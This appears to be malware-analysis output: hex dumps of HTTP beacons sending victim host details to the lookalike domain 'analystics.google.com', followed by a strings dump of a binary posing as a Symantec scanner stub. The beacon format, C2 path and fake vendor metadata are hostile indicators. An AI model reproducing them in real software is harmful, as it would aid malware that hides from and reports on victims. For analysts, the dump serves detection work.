0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515139 6a2f7368 69686e6a 39204854   1QQ9j/shihnj9 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 36302661   XX0000&key=160&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36383426 6f733d35 2e312e32 3630302e   684&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673273 786f7433 76613555 464d5234   yg2sxot3va5UFMR4
0x000000b0 (00176)   467a3773 43476e2f 535a482f 4a347679   Fz7sCGn/SZH/J4vy
0x000000c0 (00192)   31515441 62395379 64567a56 52204854   1QTAb9SydVzVR HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....


Strings
VtorlauriP.rsrctratceExchangeClass
\
.CC
 
.
.6
.

040904b0
07/26/2012
19.8
19.8.0.14
 2012 Symantec Corporation. All rights reserved.
CompanyName
Copyright 
FileDescription
	FILESIZES
FileVersion
                                 H
         (((((                  H
         h((((                  H
InternalName
KERNEL32.DLL
LegalCopyright
mscoree.dll
Navwnt
Navwnt.exe
 NUQ?
OriginalFilename
Product Date
ProductName
ProductVersion
StringFileInfo
Symantec Corporation
Symantec Shared Component
Symantec Shared Component Scanner Stub
Translation
VarFileInfo
VS_VERSION_INFO
Z+FE
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0=8L-_
0A@@Ju
0\KHo_
0SSSSS
1*G-<|
1pPmZ&I
 ]2(nel
2x*vsKL`T
{{{{{{{3
{{{{{{{33
{{{{{{{330
3333333
33333330
33333333
3	e}"`
4+/Ukl
4+|VA_
4XD!&G
(6('K6
],6XZSe
7!=CC@\
-!_7e`
7EPgP	
7wG+zf
"8<UlF#,
92WYi#
9K	Pca;
9W&^5m
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
aeL	63
An application has made an attempt to load the C runtime library incorrectly.
;a^n/Q6RueE
A_s{$noa`
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
AuupQ"-
A;{<ux
aXu,Xq
B!s=4'
CFxQ	|,
CorExitProcess
CreateWindowExA
credui.dll
CredUIParseUserNameA
- CRT not initialized
.C_/Y9
>cZ}XpniW[
D66U%ug
@.data
DDDDDD@
DDDDDDDDDDD
DDDDDDGpw
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DeRK.t
[d\i9r-2
dIC<<C/1
DispatchMessageA
dlE?*EA
D`M&vS{
DOMAIN error
eF4]Y<X
EncodePointer
EnterCriticalSection
eRA8[E
{ES/s:.
-E&uV,
ExitProcess
F9hshRp
FcV-xy
February
f;gu2m
+f%,i`
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
fmW}X+:
fn2	yF
fNCm@*
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
FZU.Ug
\g5'N(
g8U!&$
g9@(+r
]GcL +-
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GMu)"lh=
GV~&{;x
h;"Bn"
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HFs67-
`hgP&6BT
HH:mm:ss
H?LeMp
hof	SXD5
~HPd;GKAj
hxR-$NI
i9a1qV
i ml+,
In.\,{
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
i[.$Pt0F-
IsDebuggerPresent
IsValidCodePage
J3^}Hb
JanFebMarAprMayJunJulAugSepOctNovDec
January
jDq2eG
j@j ^V
J@~yGE
K&`?00
kernel32.dll
KERNEL32.dll
k<lJin]
kR)FHq
l9G?Wq
LCMapStringA
LCMapStringW
LeaveCriticalSection
l,#gut
liWqV	@
LoadLibraryA
<lPHbq
lstrcmpiA
MessageBoxA
MessageBoxW
MH%]?j
Microsoft Visual C++ Runtime Library
MIwQv)`
@mj4Q(+
^?\!mK
MM/dd/yy
Monday
Mt?(QavI
MultiByteToWideChar
M\*vtP
niXgG]
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
OC%s=4
October
O"D$8i1&
`OVhAz
`ox<E/
P;0+)eo:
pgi/>7]c
(PGy^*
&P)K+]
Please contact the application's support team for more information.
<P>M=O	
PPPPPPPP
Program: 
<program name unknown>
- pure virtual function call
qc7OGi
qSQese&
QueryPerformanceCounter
\R~1@Gu 
r3\qIb
R8Dm~vX
r	8L*7
`.rdata
r~db+W
rhBg2^Y
rPe^.a
RtlUnwind
runtime error 
Runtime Error!
Rve6_A
'{&Rx-
$=rXsj
Saturday
SbW@-Kk
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
ShowWindow
SING error
sPBD/5
!sSTx\
strstr
Sunday
SunMonTueWedThuFriSat
TerminateProcess
Tf9DD2
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
$tNMs$)
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
>tZ[M{
U0Zd'']
&UCz6`
uGd2"h
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
u O-h{
UpdateWindow
UQPXY]Y[
URPQQh`X@
`UrZiT>
USER32.dll
USER32.DLL
uZ]aMb
<[v$4%
-V=$+A
:V)`fs
?vHi9\
VirtualAlloc
VirtualFree
v	N+D$
 VP,8P
w(\16,
Wednesday
\whBY7^Y
WideCharToMultiByte
WpaY^&
Wrfkv\
WriteFile
WuX-KY
*!wUxN
wwwwwwwwwww
X0K&U.=r8
X0qjMp
X25Zn)
X<hZU0
_xl(qA
xP-BY#
Xr~@t+WYgi
xV;0H7
XvRJ0OZ
;Yc^8*
\YgAf9p
#YH)/+XY
)yI7HY
yIQ6)7
yRa}\S&
>=Yt1j
Zbb-)n
ZbKuO"
zB(Q3v
zmaef 
Z'QLe]lR
#ZS</X7
!ZY%k:
zyKCW^